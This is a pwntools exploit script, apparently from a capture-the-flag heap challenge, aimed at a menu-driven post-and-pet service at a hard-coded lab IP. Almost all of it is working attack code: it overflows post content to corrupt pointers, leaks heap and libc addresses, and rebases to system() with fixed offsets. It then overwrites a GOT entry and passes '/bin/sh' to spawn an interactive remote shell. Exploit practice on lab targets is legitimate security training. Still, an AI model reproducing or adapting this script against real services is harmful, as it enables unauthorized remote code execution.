from pwn import *
# Debug-level logging echoes every byte sent and received on the socket; the
# terminal entry is only consulted when pwntools needs to spawn a terminal.
context(log_level = "debug", terminal = ["deepin-terminal", "-x", "sh", "-c"])
# Hard-coded lab target; the connection is opened at module load, so every
# helper below talks to this single socket `t`.
t = remote('192.168.5.178', 9999)
def register(username, password):
    """Walk the service's "register" dialogue: option 1, then username and password.

    Both values are passed through str() before being sent.
    """
    dialogue = (
        ('>>\n', '1'),
        ('Username >>\n', str(username)),
        ('Password >>\n', str(password)),
    )
    for prompt, reply in dialogue:
        t.sendlineafter(prompt, reply)
def login(username,password):
    """Walk the service's "login" dialogue: option 2, then username and password.

    Both values are passed through str() before being sent.
    """
    dialogue = (
        ('>>\n', '2'),
        ('Username >>\n', str(username)),
        ('Password >>\n', str(password)),
    )
    for prompt, reply in dialogue:
        t.sendlineafter(prompt, reply)
def post(title,length,context):
    """Create a post: option 1, then title, declared content length, and content.

    `title` and `length` are str()-wrapped; `context` is sent as given, so a
    caller may pass raw bytes.
    """
    send = t.sendlineafter
    send('>>\n', '1')
    send('Title >>\n', str(title))
    send('Content Length >>\n', str(length))
    send('Content >>\n', context)
def edit(id,title,size,context):
    """Edit an existing post: option 3, then post id, new title, new size, new content.

    `id`, `title` and `size` are str()-wrapped; `context` is sent unchanged.
    """
    dialogue = [
        ('>>\n', '3'),
        ('Post id >>\n', str(id)),
        ('New title >>\n', str(title)),
        ('New content size >>\n', str(size)),
        ('New Content >>\n', context),
    ]
    for prompt, reply in dialogue:
        t.sendlineafter(prompt, reply)
def logout():
    """Select menu option 0 (logout) at the next '>>' prompt."""
    option = '0'
    t.sendlineafter('>>\n', option)
def rename(context):
    """Select menu option 6 and answer the 'pet >>' prompt with `context` verbatim."""
    send = t.sendlineafter
    send('>>\n', '6')
    send('pet >>', context)
def adopt(name):
    """Select menu option 5 and answer the 'pet >>' prompt with `name` verbatim."""
    send = t.sendlineafter
    send('>>\n', '5')
    send('pet >>', name)
def abandon():
    """Select menu option 7 (abandon) at the next '>>' prompt."""
    option = '7'
    t.sendlineafter('>>\n', option)
# Top-level driver. Every address and offset below is a constant for the
# specific binary/libc build this script was written against; none of them
# is derived from the target at runtime except the values read back via
# t.recv() and logged.
raw_input()  # block until Enter so the operator can prepare before any traffic is sent
userdb = 0x603158
register('a','a')
login('a','a')
post('a0',0x230,cyclic(520) + p64(userdb - 0x10))
edit('2','f',0x240,'cccc')
logout()
register('b','b')
login('b','b')
# Read 4 bytes after 'Type: ', zero-pad to 8, unpack as u64 and subtract 0x230;
# the result is logged as heap_addr.
t.recvuntil('Type: ')
heap = u64(t.recv(4).ljust(8,'\x00')) - 0x230
log.info('heap_addr: '+ hex(heap))
fake_pet = heap + 0x940
post('a1',0x90,p64(0x603038) * 3)
post('a2',0x230,cyclic(520) + p64(fake_pet))
edit('5','d',0x240,'dddd')
logout()
register('c','c')
login('c','c')
# Read 6 bytes after 'Type: ', zero-pad to 8 and unpack; logged as addr_puts.
t.recvuntil('Type: ')
addr_puts = u64(t.recv(6).ljust(8,'\x00'))
log.info('addr_puts: ' + hex(addr_puts))
magic = 0x603164
logout()
login('b','b')
edit('4','f',0x90,p64(magic) * 3)
logout()
login('c','c')
# `magic` is reassigned here from 4 bytes read after 'Pet Name: '.
t.recvuntil('Pet Name: ')
magic = u64(t.recv(4).ljust(8,'\x00'))
log.info('magic: ' + hex(magic))
# Fixed libc-relative offsets: addr_sys is computed from addr_puts by
# rebasing with these two constants, so they must match the target's libc.
offset_puts = 0x6f5d0
offset_sys = 0x45380
addr_sys = addr_puts - offset_puts + offset_sys
log.info('addr_sys: ' + hex(addr_sys))
post('a3',0x230,cyclic(520) + p64(fake_pet))
edit('7','d',0x240,'dddd')
logout()
register('d','d')
login('b','b')
fake_magic = magic + 0x600000000
edit('4','f',0x90,p64(fake_magic) + p64(0x603018))
logout()
login('d','d')
rename(p64(addr_sys))
logout()
register('e','e')
login('e','e')
adopt('/bin/sh\x00')
abandon()
# Hand the socket over to the operator's terminal.
t.interactive()